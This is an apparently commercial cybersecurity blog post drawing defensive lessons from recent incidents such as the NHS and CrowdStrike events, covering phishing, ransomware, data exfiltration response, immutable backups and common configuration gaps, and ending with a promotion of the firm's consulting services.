In light of recent high-profile cyber attacks, I’ve been reflecting on how learnings from cyber incidents highlight the urgent need to rethink our cybersecurity strategies. The patterns emerging from these incidents such as data exfiltration and sophisticated phishing schemes reveal critical vulnerabilities in many organisations.
From the importance of multi-factor authentication to the need for better integration of security solutions, the lessons are clear.
In this article, I’ll share the key takeaways and offer actionable insights to help you strengthen our defences and stay ahead of evolving threats.
What lessons have we learned from recent cyber incidents?
The vast majority of publicly reported large scale cyber-attacks, in the UK and globally, have involved data exfiltration. Many attacks initially involved impersonation via phishing campaigns and really targeted activity.
Allegedly, the cyber attacks on the London NHS involved 3rd party services where multi-factor authentication (MFA) may not have been enforced. In other attacks, at least the initial autonomy has involved harvested credentials later in the working day which led to onward out of hours activities and account elevations which were not detected.
The cyber attacks on Microsoft Corporation involved Business Email Compromise (BEC) and impersonations.
So what have we learned?
We need to challenge our existing posture, monitoring, processes and analytical rules with the above knowledge to understand how we would perform.
User awareness training, whilst part of continual cybersecurity improvements, also needs to understand how attack autonomy evolves and what additional detections of unexpected activities should be implemented.
Many security point solutions are not closely integrated, which offers exploitable gaps, for bad actors to exploit and they do. In many of the most recent attacks, endpoint security solutions were not closely integrated to network, email and vulnerability management solutions.
Scheduling high-severity security updates to be applied within 28 days creates significant opportunities for bad actors, especially when the average exploitation time is less than a day.
It is not just the over confidence dilemma here, but also the need to recognise the most important metric is, earlier visibility of a security issue with accompanying response.
We speak with many customers who have enhanced their endpoint security and SIEM solutions but are unsure how to respond to alerts and incidents. Just like with Incident Response, having a plan and regularly reviewing it is crucial for continual improvement.
Why is ransomware still so effective?
Let’s remember that we have made some progress in reducing the effectiveness and prevalence of Ransomware. Our ability to respond as quickly as bad actors can change and morph needs to improve.
The basic facts are, Bad actors depend on forcing a position where paying a ransom is the easier and cheaper option to regain access to data OR to stop publication of exfiltrated data. Or both.
Fundamentally, ransomware remains a simple way to make money illegally, especially as access to powerful ransomware tools becomes easier (though eliminating them remains challenging).
Ransomware is designed as a highly damaging tool when combined with data exfiltration, targeting reputation issues from multiple angles.
We are getting internationally more effective at taking down organised entities, but, the ability to reform, unpoliced, in new areas of the dark web as well as tackling some nation state sponsored actors makes policing time consuming and challenging across some borders.
As organisations have become more effective at faster business recovery, the emphasis has shifted to publication of exfiltrated data as the main lever.
Bad Actors are more targeted, and instil fear and panic into victims, using increasingly aggressive tactics. They often issue payment links which are infected with additional malware and use intimating messages and threats to life as well as targeting family members. Personal inclusions increases the emotional involvement!
Vulnerabilities are continually identified, some present high levels of business risk which need to be quickly resolved.
Attackers are extremely automated and targeted on exploiting these weaknesses within hours of identification – just ask yourself how fast does your organisation update devices based on critical or high severity vulnerabilities?
We have to adapt and protect in the same timescales to reduce exploitation opportunities.
Whilst the overconfidence dilemma may not take into account human error or deception from sophisticated phishing attacks, email data exfiltration has remained in the top three causes for the last 15 years.
How many organisations truly review phishing metrics to understand how best to improve phishing protection for the most targeted or vulnerable users and processes?
Over a third of organisations know that setting DMARC and DKIM policies reduces the effectiveness of phishing attacks as email sender domain must be validated and scored yet only enable DMARC or DKIM and do not set active policies – so it will have no protective effect!
How do you respond to suspected data exfiltration?
The first question most leadership teams seek to understand is, what have they got?
It is often not an easy question to answer quickly, yet the pressure to know is immense. Many bad actors will also indicate that they have a large amount of data which may not be the case.
This is part of increasing the pressure, as attackers can identify if data is tagged or classified. A business’s confidence comes from knowing whether data was detected and what has been exfiltrated.
They will be evasive and may at some point post a sample of exfiltrated data. It is also important to remember that the bad actor demanding a payment may not be the party who undertook the exfiltration. Multiple bad actors are invariably involved with ransoms.
If a business has tagged and classified data, it is invariably easier to understand what data may have been exfiltrated. It is not easy if data has not been classified or operates across multiple data services. Where devices are stolen or lost, remote deletion technology.
Can immutable backups be compromised?
Immutable backups cannot be altered – they are by definition unchangeable, and protected from ransomware and malware attacks in terms of those which seek to change encryption parameters, keys and storage.
You must still consider protecting the immutable backup platform as bad actors are increasing seeking to change access permissions and privileges to prevent access to recover from immutable copies.
Another example is an attacker gaining cloud administrator rights and simply deleting storage or subscription accounts containing data vaults. For example, you should enable the immutability function in Microsoft Azure backup recovery service vaults AND enable Vault Lock.
Immutability cannot be reversed. However, you need to back up all your Storage Vault keys and ensure protection processes against insider threats. A disgruntled employee or internal admin with subscription access could be forced to delete storage subscriptions once resources have been deleted.
What are common security configuration issues we see?
- Incorrect, expired or wildcard certificates on key public facing services and protocols
- Email security solutions which are not frequently tuned or operate with enhanced analytical rules based on malicious content which evades detection
- Non removal of Azure privileged rights or left user accounts
- Conflicting Microsoft ENTRA conditional access policies
- Monitoring for significant file extension or movement detections
- Absence of updated and tested Incident Response plans
- Weak privileged account passwords which are known to be weak but remain unchanged
- Unrestricted App registration capabilities for users within an organisation which may enabling enhanced rights
- Over reliance on MFA as a principle source of security in validating user access
- Not ensuring or conflicting policies which disable or do not request MFA for certain users or groups
- Unpatched vulnerabilities
DOWNLOAD OUR ACTIONABLE SECURITY CHECKLIST HERE
How do bad actors evade detection in living off the land attacks?
Evasion techniques usually seek to deceive, divert or masquerade malicious intent when attempting to gain unauthorised access to a business.
This initial activity may be through:
- Impersonation attacks, compromise or use of harvested credentials
- Vulnerability exploitation attacks using identified and unpatched weaknesses to gain unauthorised access
- Malware or malicious code creation which creates erroneous connections, accounts or privileges to scan and access an environment
- Installing malware via browser plugins or bots which collate activity tracking insights and information
How do we prevent future CrowdStrike-like security incidents?
Firstly, these events are very uncommon but there is no avoiding the impact this event had globally.
We now know from Crowdstrike, this was the result of a software bug within the content validation testing process which failed to identify a further software bug within the content released to all endpoints.
There are still considerable questions as to why, testing did not identify the severity of this issue prior to release but Crowdstrike’s review remains ongoing.
Many other cyber providers already complete phased releases which aims to minimise amplification of these more serious content issues. There have been millions of content updates across all cybersecurity platforms over the last few decades which have only served to improve threat protection and detections.
There are several lessons to be learnt from this episode though.
Firstly, and similar to the way many organisations deploy Operating System updates, there is a phased release and assurance to a business over a few days.
Where security products provide such a feature, or release to a test assurance unit, this should be considered. If this is not a feature, perhaps this becomes a product selection criteria at a point of review or renewal.
Ultimately, vendors whose software is permitted or code to interact with Ring 0 or the Kernel, need to introduce more extensive testing.
Undoubtedly, vendor selection and assurances moving forwards as well as liabilities for failure will have to be reviewed given the impact quantum this error created.
Independent testing and assurance should be introduced as a intermediary stage with agreed platforms included to ensure, where possible, any update does not create instabilities or performance issues.
That’s a wrap!
Thank you for taking the time to read this article! We hope these learnings from cyber incidents help you understand how you can better protect your business. If you have any cybersecurity concerns, we offer a range of services to help you strengthen your security measures.
Our offerings include cybersecurity consulting services, security posture assessments, and CISO advisory services. Whether you need to identify vulnerabilities, enhance your security strategy, or receive expert guidance, our team is here to assist you.
Or if you just need some expert advice, we offer no-obligation, 100% confidential cyber clinics. These are free sessions with an expert from our team to help you tackle cybersecurity issues head-on.